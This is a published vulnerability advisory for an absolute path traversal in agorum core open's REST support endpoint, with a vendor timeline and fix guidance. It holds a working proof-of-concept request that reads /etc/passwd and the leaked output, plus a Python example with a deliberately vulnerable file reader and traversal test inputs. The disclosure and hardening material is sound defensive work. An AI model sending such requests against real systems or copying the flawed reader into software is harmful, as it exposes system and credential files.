usd-2025-0027 | Agorum core open 11.9.1.3-1857 - Absolute Path Traversal
Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Absolute Path Traversal (CWE-36)
Security Risk: High
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0027
Description
agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.
Proof of Concept
The support module of agorum core's REST API permits an attacker with administrative rights to read arbitrary files on the underlying system: the fileName parameter of the downloadZip endpoint is used as a file system path without restricting it to the intended support directory, so an absolute path is accepted as-is. The following request can be used to read the /etc/passwd file:
GET /api/rest/support/status/downloadZip?fileName=/etc/passwd HTTP/1.1
Host: localhost
Cookie: JSESSIONID=[REDACTED];
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[...]
The server's response contains the full content of the requested file. Note that although the response advertises Content-Type: application/zip, the body is the raw, uncompressed file, as can be seen in the following output:
HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Disposition: attachment; filename*=utf-8''passwd
Date: Mon, 28 Apr 2025 08:45:42 GMT
Content-Type: application/zip
Server: Apache-Coyote/1.1
Content-Length: 3510
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
[...]
Fix
The fileName parameter should never be used as a file system path directly. Reject absolute paths (POSIX, Windows drive-letter and UNC forms) and any path separators or dot-dot segments, and accept only plain file names that match an allowlist of the names the endpoint is actually meant to serve. Resolve the resulting path canonically (following symbolic links) and verify that the result still lies inside the intended support directory before opening it, so that a symlink placed inside that directory cannot point elsewhere. In addition, run the application with file system permissions limited to the files and directories it needs, so that a future bypass cannot reach files such as /etc/passwd.
Users of agorum core open should upgrade to version 11.9.2 or 11.10.1, which contain the fix.
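The following Python module is an added example (not agorum core's code, which is Java) that contrasts the flawed pattern with a hardened resolver implementing the checks above. The support directory layout, the bundle naming rule (a .zip with a conservative character set) and the fixture built in a temporary directory are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a user-supplied file name would leave the support directory."""


# Allowlist for the shape of a legitimate name. Assumption for the example:
# support bundles are .zip files; the pattern also excludes '/', '\\' and '..'.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.zip")


def vulnerable_read(file_name: str) -> str:
    """Mirrors the flaw: the parameter is used as a path as-is, so an absolute
    value such as /etc/passwd is honoured (CWE-36)."""
    return Path(file_name).read_text()


def resolve_support_file(base_dir, file_name: str) -> Path:
    """Map a user-supplied name to a file inside base_dir, or raise."""
    base = Path(base_dir).resolve(strict=True)
    # 1. Absolute paths are never legitimate here. Path.is_absolute() only
    #    knows the host's convention, so Windows drive letters and leading
    #    separators are checked explicitly as well.
    if (Path(file_name).is_absolute()
            or file_name[:1] in ("/", "\\")
            or re.match(r"^[A-Za-z]:", file_name)):
        raise PathTraversalError(f"absolute path rejected: {file_name!r}")
    # 2. Allowlist the name itself.
    if not SAFE_NAME.fullmatch(file_name):
        raise PathTraversalError(f"file name not in allowlist: {file_name!r}")
    # 3. Canonicalise (follows symlinks) and confirm containment. Step 2 alone
    #    would still let a symlink inside base_dir point at /etc/passwd.
    candidate = (base / file_name).resolve()
    if candidate.parent != base:
        raise PathTraversalError(f"resolved outside support dir: {candidate}")
    if not candidate.is_file():
        raise FileNotFoundError(file_name)
    return candidate


def check(base_dir, file_name: str) -> str:
    """Verdict string for one name: 'ok:<name>', 'rejected' or 'missing'."""
    try:
        return "ok:" + resolve_support_file(base_dir, file_name).name
    except PathTraversalError:
        return "rejected"
    except FileNotFoundError:
        return "missing"


def build_demo_dir() -> tuple[Path, Path, bool]:
    """Constructed fixture: a support dir with one bundle, a 'secret' file
    outside it, and (where the OS allows) a symlink inside the dir that points
    at the secret. Returns (support_dir, secret_file, symlink_created)."""
    root = Path(tempfile.mkdtemp(prefix="usd-2025-0027-"))
    base = root / "support"
    base.mkdir()
    (base / "status-2025-04-28.zip").write_bytes(b"PK\x05\x06" + b"\0" * 18)  # empty zip
    secret = root / "secret.txt"
    secret.write_text("root:x:0:0:root:/root:/usr/bin/zsh\n")  # constructed content
    link_ok = True
    try:
        (base / "escape.zip").symlink_to(secret)
    except OSError:
        link_ok = False
    return base, secret, link_ok


if __name__ == "__main__":
    base, secret, link_ok = build_demo_dir()
    print("vulnerable:", vulnerable_read(str(secret)).strip())
    for name in ("status-2025-04-28.zip", "/etc/passwd", "../../etc/passwd",
                 "C:\\Windows\\win.ini", "escape.zip"):
        print(f"{name!r:28} -> {check(base, name)}")
```

The symlink case is the reason step 3 exists even though step 2 already forbids separators: a name can pass every syntactic check and still resolve, through a link an attacker managed to create, to a file outside the directory.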
References
Timeline
- 2025-05-05: First contact request via mail.
- 2025-05-05: The vendor has confirmed the delivery and has begun investigating the matter.
- 2025-05-07: The vendor has begun addressing and fixing the issue.
- 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
- 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
- 2025-06-27: This advisory is published.
Credits
This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.